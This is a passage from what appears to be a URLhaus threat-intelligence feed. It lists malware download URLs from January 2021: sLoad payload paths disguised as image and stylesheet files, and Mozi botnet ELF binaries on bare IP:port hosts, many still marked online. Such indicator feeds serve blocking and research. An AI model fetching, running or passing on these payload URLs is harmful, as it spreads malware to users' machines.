UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"Cryptolaemus1","larted":"false","tags":["sLoad"]} +{"id":"961439","urlhaus_reference":"https://urlhaus.abuse.ch/url/961439/","url":"https://letonguesc.com/leto/RSSPPL67P15G535L/map.gif","url_status":"offline","host":"letonguesc.com","date_added":"2021-01-14 20:49:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"Cryptolaemus1","larted":"false","tags":["sLoad"]} +{"id":"961440","urlhaus_reference":"https://urlhaus.abuse.ch/url/961440/","url":"https://fhivelifestyle.online/nhbrwvdffsgt/adf/uk.css","url_status":"offline","host":"fhivelifestyle.online","date_added":"2021-01-14 20:49:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"Cryptolaemus1","larted":"false","tags":["sLoad"]} +{"id":"961441","urlhaus_reference":"https://urlhaus.abuse.ch/url/961441/","url":"https://letonguesc.com/leto/BNTLGU67R11L706R/blank.gif","url_status":"offline","host":"letonguesc.com","date_added":"2021-01-14 20:49:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"Cryptolaemus1","larted":"false","tags":["sLoad"]} +{"id":"961437","urlhaus_reference":"https://urlhaus.abuse.ch/url/961437/","url":"https://cxminute.com/minu/03713610651/map.css","url_status":"offline","host":"cxminute.com","date_added":"2021-01-14 20:48:37 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"Cryptolaemus1","larted":"false","tags":["sLoad"]} +{"id":"961436","urlhaus_reference":"https://urlhaus.abuse.ch/url/961436/","url":"https://univirtek.com/viro/01312580507/uk.png","url_status":"offline","host":"univirtek.com","date_added":"2021-01-14 20:48:36 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"Cryptolaemus1","larted":"false","tags":["sLoad"]} +{"id":"961431","urlhaus_reference":"https://urlhaus.abuse.ch/url/961431/","url":"https://cxminute.com/minu/FRNRST34B11F843P/blank.jpg","url_status":"offline","host":"cxminute.com","date_added":"2021-01-14 20:48:35 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"Cryptolaemus1","larted":"false","tags":["sLoad"]} +{"id":"961432","urlhaus_reference":"https://urlhaus.abuse.ch/url/961432/","url":"https://univirtek.com/viro/RCUNDA90D24Z100H/1x1.png","url_status":"offline","host":"univirtek.com","date_added":"2021-01-14 20:48:35 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"Cryptolaemus1","larted":"false","tags":["sLoad"]} +{"id":"961433","urlhaus_reference":"https://urlhaus.abuse.ch/url/961433/","url":"https://univirtek.com/viro/GTTGRI72H19A952D/map.css","url_status":"offline","host":"univirtek.com","date_added":"2021-01-14 20:48:35 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"Cryptolaemus1","larted":"false","tags":["sLoad"]} +{"id":"961434","urlhaus_reference":"https://urlhaus.abuse.ch/url/961434/","url":"https://univirtek.com/viro/00385010103/map.png","url_status":"offline","host":"univirtek.com","date_added":"2021-01-14 20:48:35 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"Cryptolaemus1","larted":"false","tags":["sLoad"]} +{"id":"961435","urlhaus_reference":"https://urlhaus.abuse.ch/url/961435/","url":"https://ladiesincode.com/ladi/04263990162/map.css","url_status":"offline","host":"ladiesincode.com","date_added":"2021-01-14 20:48:35 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"Cryptolaemus1","larted":"false","tags":["sLoad"]} +{"id":"961428","urlhaus_reference":"https://urlhaus.abuse.ch/url/961428/","url":"https://univirtek.com/viro/BNNSFN74A13G674O/logo.png","url_status":"offline","host":"univirtek.com","date_added":"2021-01-14 20:48:34 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"Cryptolaemus1","larted":"false","tags":["sLoad"]} +{"id":"961429","urlhaus_reference":"https://urlhaus.abuse.ch/url/961429/","url":"https://univirtek.com/viro/RZZCRS93B15G224O/it.gif","url_status":"offline","host":"univirtek.com","date_added":"2021-01-14 20:48:34 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"Cryptolaemus1","larted":"false","tags":["sLoad"]} +{"id":"961430","urlhaus_reference":"https://urlhaus.abuse.ch/url/961430/","url":"https://cxminute.com/minu/01495100032/maps.gif","url_status":"offline","host":"cxminute.com","date_added":"2021-01-14 20:48:34 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"Cryptolaemus1","larted":"false","tags":["sLoad"]} +{"id":"961427","urlhaus_reference":"https://urlhaus.abuse.ch/url/961427/","url":"https://letonguesc.com/leto/CMPDVD69C11G693Z/map.gif","url_status":"offline","host":"letonguesc.com","date_added":"2021-01-14 20:48:07 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"Cryptolaemus1","larted":"false","tags":["sLoad"]} +{"id":"961426","urlhaus_reference":"https://urlhaus.abuse.ch/url/961426/","url":"https://cxminute.com/minu/LLLMRC84B29A944R/it.jpg","url_status":"offline","host":"cxminute.com","date_added":"2021-01-14 20:48:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"Cryptolaemus1","larted":"false","tags":["sLoad"]} +{"id":"961421","urlhaus_reference":"https://urlhaus.abuse.ch/url/961421/","url":"https://cxminute.com/minu/PRSSFN72L18C573S/map.css","url_status":"offline","host":"cxminute.com","date_added":"2021-01-14 20:48:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"Cryptolaemus1","larted":"false","tags":["sLoad"]} +{"id":"961422","urlhaus_reference":"https://urlhaus.abuse.ch/url/961422/","url":"https://ladiesincode.com/ladi/00814870150/1x1.png","url_status":"offline","host":"ladiesincode.com","date_added":"2021-01-14 20:48:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"Cryptolaemus1","larted":"false","tags":["sLoad"]} +{"id":"961423","urlhaus_reference":"https://urlhaus.abuse.ch/url/961423/","url":"https://ladiesincode.com/ladi/03635540234/it.gif","url_status":"offline","host":"ladiesincode.com","date_added":"2021-01-14 20:48:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"Cryptolaemus1","larted":"false","tags":["sLoad"]} +{"id":"961424","urlhaus_reference":"https://urlhaus.abuse.ch/url/961424/","url":"https://univirtek.com/viro/PLCSFN62B11D548Q/map.gif","url_status":"offline","host":"univirtek.com","date_added":"2021-01-14 20:48:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"Cryptolaemus1","larted":"false","tags":["sLoad"]} +{"id":"961425","urlhaus_reference":"https://urlhaus.abuse.ch/url/961425/","url":"https://univirtek.com/viro/03294650167/maps.jpg","url_status":"offline","host":"univirtek.com","date_added":"2021-01-14 20:48:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"Cryptolaemus1","larted":"false","tags":["sLoad"]} +{"id":"961418","urlhaus_reference":"https://urlhaus.abuse.ch/url/961418/","url":"https://univirtek.com/viro/GGLSCR73D17C627Q/blank.css","url_status":"offline","host":"univirtek.com","date_added":"2021-01-14 20:48:03 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"Cryptolaemus1","larted":"false","tags":["sLoad"]} +{"id":"961419","urlhaus_reference":"https://urlhaus.abuse.ch/url/961419/","url":"https://univirtek.com/viro/CRRLRA68A70H501X/maps.css","url_status":"offline","host":"univirtek.com","date_added":"2021-01-14 20:48:03 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"Cryptolaemus1","larted":"false","tags":["sLoad"]} +{"id":"961420","urlhaus_reference":"https://urlhaus.abuse.ch/url/961420/","url":"https://ladiesincode.com/ladi/CRSNLD59R12L840V/blank.jpg","url_status":"offline","host":"ladiesincode.com","date_added":"2021-01-14 20:48:03 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"Cryptolaemus1","larted":"false","tags":["sLoad"]} +{"id":"961416","urlhaus_reference":"https://urlhaus.abuse.ch/url/961416/","url":"https://belfetproduction.com/bella/RTTCRL58M29A794D/logo.css","url_status":"offline","host":"belfetproduction.com","date_added":"2021-01-14 20:47:35 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"Cryptolaemus1","larted":"false","tags":["sLoad"]} +{"id":"961417","urlhaus_reference":"https://urlhaus.abuse.ch/url/961417/","url":"https://letonguesc.com/leto/04138120169/en.jpg","url_status":"offline","host":"letonguesc.com","date_added":"2021-01-14 20:47:35 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"Cryptolaemus1","larted":"false","tags":["sLoad"]} +{"id":"961408","urlhaus_reference":"https://urlhaus.abuse.ch/url/961408/","url":"https://letonguesc.com/leto/SPGMRC73H13A475I/it.jpg","url_status":"offline","host":"letonguesc.com","date_added":"2021-01-14 20:47:33 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"Cryptolaemus1","larted":"false","tags":["sLoad"]} +{"id":"961409","urlhaus_reference":"https://urlhaus.abuse.ch/url/961409/","url":"https://letonguesc.com/leto/80007070552/it.png","url_status":"offline","host":"letonguesc.com","date_added":"2021-01-14 20:47:33 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"Cryptolaemus1","larted":"false","tags":["sLoad"]} +{"id":"961410","urlhaus_reference":"https://urlhaus.abuse.ch/url/961410/","url":"https://letonguesc.com/leto/02482130271/logo.png","url_status":"offline","host":"letonguesc.com","date_added":"2021-01-14 20:47:33 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"Cryptolaemus1","larted":"false","tags":["sLoad"]} +{"id":"961411","urlhaus_reference":"https://urlhaus.abuse.ch/url/961411/","url":"https://univirtek.com/viro/15730201009/uk.gif","url_status":"offline","host":"univirtek.com","date_added":"2021-01-14 20:47:33 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"Cryptolaemus1","larted":"false","tags":["sLoad"]} +{"id":"961412","urlhaus_reference":"https://urlhaus.abuse.ch/url/961412/","url":"https://univirtek.com/viro/01074480250/maps.css","url_status":"offline","host":"univirtek.com","date_added":"2021-01-14 20:47:33 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"Cryptolaemus1","larted":"false","tags":["sLoad"]} +{"id":"961413","urlhaus_reference":"https://urlhaus.abuse.ch/url/961413/","url":"https://cxminute.com/minu/SCHRKE77C47G224W/1x1.jpg","url_status":"offline","host":"cxminute.com","date_added":"2021-01-14 20:47:33 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"Cryptolaemus1","larted":"false","tags":["sLoad"]} +{"id":"961414","urlhaus_reference":"https://urlhaus.abuse.ch/url/961414/","url":"https://cxminute.com/minu/04281560377/en.css","url_status":"offline","host":"cxminute.com","date_added":"2021-01-14 20:47:33 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"Cryptolaemus1","larted":"false","tags":["sLoad"]} +{"id":"961415","urlhaus_reference":"https://urlhaus.abuse.ch/url/961415/","url":"https://ladiesincode.com/ladi/02613440060/maps.png","url_status":"offline","host":"ladiesincode.com","date_added":"2021-01-14 20:47:33 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"Cryptolaemus1","larted":"false","tags":["sLoad"]} +{"id":"961406","urlhaus_reference":"https://urlhaus.abuse.ch/url/961406/","url":"https://nowyouknowent.com/werdona/PLLRRT83A05H501O/it.gif","url_status":"offline","host":"nowyouknowent.com","date_added":"2021-01-14 20:47:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"Cryptolaemus1","larted":"false","tags":["sLoad"]} +{"id":"961407","urlhaus_reference":"https://urlhaus.abuse.ch/url/961407/","url":"https://hoagtechhydroponics.com/teco/LGTCDC74T45F205G/logo.png","url_status":"offline","host":"hoagtechhydroponics.com","date_added":"2021-01-14 20:47:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"Cryptolaemus1","larted":"false","tags":["sLoad"]} +{"id":"961404","urlhaus_reference":"https://urlhaus.abuse.ch/url/961404/","url":"https://belfetproduction.com/bella/00160060349/uk.jpg","url_status":"offline","host":"belfetproduction.com","date_added":"2021-01-14 20:42:33 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"Cryptolaemus1","larted":"false","tags":["sLoad"]} +{"id":"961405","urlhaus_reference":"https://urlhaus.abuse.ch/url/961405/","url":"https://belfetproduction.com/bella/01288650243/1x1.jpg","url_status":"offline","host":"belfetproduction.com","date_added":"2021-01-14 20:42:33 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"Cryptolaemus1","larted":"false","tags":["sLoad"]} +{"id":"961403","urlhaus_reference":"https://urlhaus.abuse.ch/url/961403/","url":"http://117.251.59.53:50611/bin.sh","url_status":"online","host":"117.251.59.53","date_added":"2021-01-14 20:39:09 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"geenensp","larted":"true","tags":["32-bit","elf","mips"]} +{"id":"961402","urlhaus_reference":"https://urlhaus.abuse.ch/url/961402/","url":"http://60.243.120.169:45371/Mozi.a","url_status":"online","host":"60.243.120.169","date_added":"2021-01-14 20:36:14 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961400","urlhaus_reference":"https://urlhaus.abuse.ch/url/961400/","url":"http://61.54.50.155:50093/Mozi.m","url_status":"online","host":"61.54.50.155","date_added":"2021-01-14 20:36:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961401","urlhaus_reference":"https://urlhaus.abuse.ch/url/961401/","url":"http://59.95.175.109:36652/Mozi.m","url_status":"online","host":"59.95.175.109","date_added":"2021-01-14 20:36:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961397","urlhaus_reference":"https://urlhaus.abuse.ch/url/961397/","url":"http://42.235.65.235:54182/Mozi.m","url_status":"online","host":"42.235.65.235","date_added":"2021-01-14 20:36:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961398","urlhaus_reference":"https://urlhaus.abuse.ch/url/961398/","url":"http://222.137.177.178:46048/Mozi.m","url_status":"online","host":"222.137.177.178","date_added":"2021-01-14 20:36:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961399","urlhaus_reference":"https://urlhaus.abuse.ch/url/961399/","url":"http://222.137.232.114:33953/Mozi.m","url_status":"online","host":"222.137.232.114","date_added":"2021-01-14 20:36:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961393","urlhaus_reference":"https://urlhaus.abuse.ch/url/961393/","url":"http://182.117.10.46:36447/Mozi.a","url_status":"online","host":"182.117.10.46","date_added":"2021-01-14 20:35:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961394","urlhaus_reference":"https://urlhaus.abuse.ch/url/961394/","url":"http://171.38.193.49:36828/Mozi.m","url_status":"online","host":"171.38.193.49","date_added":"2021-01-14 20:35:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961395","urlhaus_reference":"https://urlhaus.abuse.ch/url/961395/","url":"http://202.111.130.185:55281/Mozi.m","url_status":"online","host":"202.111.130.185","date_added":"2021-01-14 20:35:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961396","urlhaus_reference":"https://urlhaus.abuse.ch/url/961396/","url":"http://119.102.83.85:49772/Mozi.m","url_status":"online","host":"119.102.83.85","date_added":"2021-01-14 20:35:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961391","urlhaus_reference":"https://urlhaus.abuse.ch/url/961391/","url":"http://117.222.165.246:50229/Mozi.m","url_status":"offline","host":"117.222.165.246","date_added":"2021-01-14 20:34:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961392","urlhaus_reference":"https://urlhaus.abuse.ch/url/961392/","url":"http://117.222.170.34:39996/Mozi.m","url_status":"online","host":"117.222.170.34","date_added":"2021-01-14 20:34:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961387","urlhaus_reference":"https://urlhaus.abuse.ch/url/961387/","url":"http://113.239.210.87:50195/Mozi.a","url_status":"online","host":"113.239.210.87","date_added":"2021-01-14 20:34:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961388","urlhaus_reference":"https://urlhaus.abuse.ch/url/961388/","url":"http://115.62.159.229:52447/Mozi.a","url_status":"online","host":"115.62.159.229","date_added":"2021-01-14 20:34:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961389","urlhaus_reference":"https://urlhaus.abuse.ch/url/961389/","url":"http://113.90.237.126:56321/Mozi.m","url_status":"online","host":"113.90.237.126","date_added":"2021-01-14 20:34:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961390","urlhaus_reference":"https://urlhaus.abuse.ch/url/961390/","url":"http://115.219.146.151:54620/Mozi.m","url_status":"online","host":"115.219.146.151","date_added":"2021-01-14 20:34:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961386","urlhaus_reference":"https://urlhaus.abuse.ch/url/961386/","url":"http://60.7.65.79:52064/Mozi.a","url_status":"online","host":"60.7.65.79","date_added":"2021-01-14 20:23:07 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961385","urlhaus_reference":"https://urlhaus.abuse.ch/url/961385/","url":"http://59.93.16.88:47401/Mozi.m","url_status":"offline","host":"59.93.16.88","date_added":"2021-01-14 20:22:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961382","urlhaus_reference":"https://urlhaus.abuse.ch/url/961382/","url":"http://59.95.174.61:46527/Mozi.m","url_status":"online","host":"59.95.174.61","date_added":"2021-01-14 20:22:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961383","urlhaus_reference":"https://urlhaus.abuse.ch/url/961383/","url":"http://59.93.21.239:38132/Mozi.m","url_status":"offline","host":"59.93.21.239","date_added":"2021-01-14 20:22:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961384","urlhaus_reference":"https://urlhaus.abuse.ch/url/961384/","url":"http://45.176.111.252:59015/Mozi.m","url_status":"online","host":"45.176.111.252","date_added":"2021-01-14 20:22:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961379","urlhaus_reference":"https://urlhaus.abuse.ch/url/961379/","url":"http://222.137.176.198:59454/Mozi.m","url_status":"online","host":"222.137.176.198","date_added":"2021-01-14 20:22:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961380","urlhaus_reference":"https://urlhaus.abuse.ch/url/961380/","url":"http://42.232.233.146:37883/Mozi.m","url_status":"online","host":"42.232.233.146","date_added":"2021-01-14 20:22:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961381","urlhaus_reference":"https://urlhaus.abuse.ch/url/961381/","url":"http://42.234.255.164:55209/Mozi.m","url_status":"online","host":"42.234.255.164","date_added":"2021-01-14 20:22:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961378","urlhaus_reference":"https://urlhaus.abuse.ch/url/961378/","url":"http://182.59.96.114:41062/Mozi.m","url_status":"online","host":"182.59.96.114","date_added":"2021-01-14 20:21:33 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961377","urlhaus_reference":"https://urlhaus.abuse.ch/url/961377/","url":"http://211.226.185.30:60380/i","url_status":"online","host":"211.226.185.30","date_added":"2021-01-14 20:21:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"geenensp","larted":"true","tags":["32-bit","arm","elf"]} +{"id":"961375","urlhaus_reference":"https://urlhaus.abuse.ch/url/961375/","url":"http://195.87.190.106:54796/Mozi.m","url_status":"online","host":"195.87.190.106","date_added":"2021-01-14 20:21:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961376","urlhaus_reference":"https://urlhaus.abuse.ch/url/961376/","url":"http://183.188.139.70:35251/Mozi.m","url_status":"online","host":"183.188.139.70","date_added":"2021-01-14 20:21:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961373","urlhaus_reference":"https://urlhaus.abuse.ch/url/961373/","url":"http://117.222.173.201:50562/Mozi.m","url_status":"offline","host":"117.222.173.201","date_added":"2021-01-14 20:20:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961374","urlhaus_reference":"https://urlhaus.abuse.ch/url/961374/","url":"http://117.215.248.158:33445/Mozi.m","url_status":"online","host":"117.215.248.158","date_added":"2021-01-14 20:20:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961370","urlhaus_reference":"https://urlhaus.abuse.ch/url/961370/","url":"http://120.85.197.148:60280/Mozi.a","url_status":"online","host":"120.85.197.148","date_added":"2021-01-14 20:20:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961371","urlhaus_reference":"https://urlhaus.abuse.ch/url/961371/","url":"http://182.126.66.149:46386/Mozi.m","url_status":"online","host":"182.126.66.149","date_added":"2021-01-14 20:20:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961372","urlhaus_reference":"https://urlhaus.abuse.ch/url/961372/","url":"http://182.113.4.64:60288/Mozi.m","url_status":"online","host":"182.113.4.64","date_added":"2021-01-14 20:20:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961368","urlhaus_reference":"https://urlhaus.abuse.ch/url/961368/","url":"http://113.116.144.14:49731/Mozi.a","url_status":"online","host":"113.116.144.14","date_added":"2021-01-14 20:19:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961369","urlhaus_reference":"https://urlhaus.abuse.ch/url/961369/","url":"http://115.56.186.224:38837/Mozi.a","url_status":"online","host":"115.56.186.224","date_added":"2021-01-14 20:19:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961366","urlhaus_reference":"https://urlhaus.abuse.ch/url/961366/","url":"http://115.48.159.43:37814/Mozi.m","url_status":"online","host":"115.48.159.43","date_added":"2021-01-14 20:19:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961367","urlhaus_reference":"https://urlhaus.abuse.ch/url/961367/","url":"http://115.50.233.247:47507/Mozi.m","url_status":"online","host":"115.50.233.247","date_added":"2021-01-14 20:19:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961365","urlhaus_reference":"https://urlhaus.abuse.ch/url/961365/","url":"http://115.58.39.251:47140/i","url_status":"online","host":"115.58.39.251","date_added":"2021-01-14 20:18:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"geenensp","larted":"true","tags":["32-bit","elf","mips"]} +{"id":"961363","urlhaus_reference":"https://urlhaus.abuse.ch/url/961363/","url":"http://42.224.170.54:41514/Mozi.a","url_status":"online","host":"42.224.170.54","date_added":"2021-01-14 20:10:11 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961364","urlhaus_reference":"https://urlhaus.abuse.ch/url/961364/","url":"http://42.235.100.87:58748/Mozi.m","url_status":"online","host":"42.235.100.87","date_added":"2021-01-14 20:10:11 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961362","urlhaus_reference":"https://urlhaus.abuse.ch/url/961362/","url":"http://175.168.229.209:51183/Mozi.m","url_status":"online","host":"175.168.229.209","date_added":"2021-01-14 20:10:09 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961361","urlhaus_reference":"https://urlhaus.abuse.ch/url/961361/","url":"http://182.119.164.30:42104/Mozi.m","url_status":"online","host":"182.119.164.30","date_added":"2021-01-14 20:10:07 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961354","urlhaus_reference":"https://urlhaus.abuse.ch/url/961354/","url":"http://42.224.52.56:53130/Mozi.m","url_status":"online","host":"42.224.52.56","date_added":"2021-01-14 20:10:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961355","urlhaus_reference":"https://urlhaus.abuse.ch/url/961355/","url":"http://58.255.134.250:57768/Mozi.m","url_status":"online","host":"58.255.134.250","date_added":"2021-01-14 20:10:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not 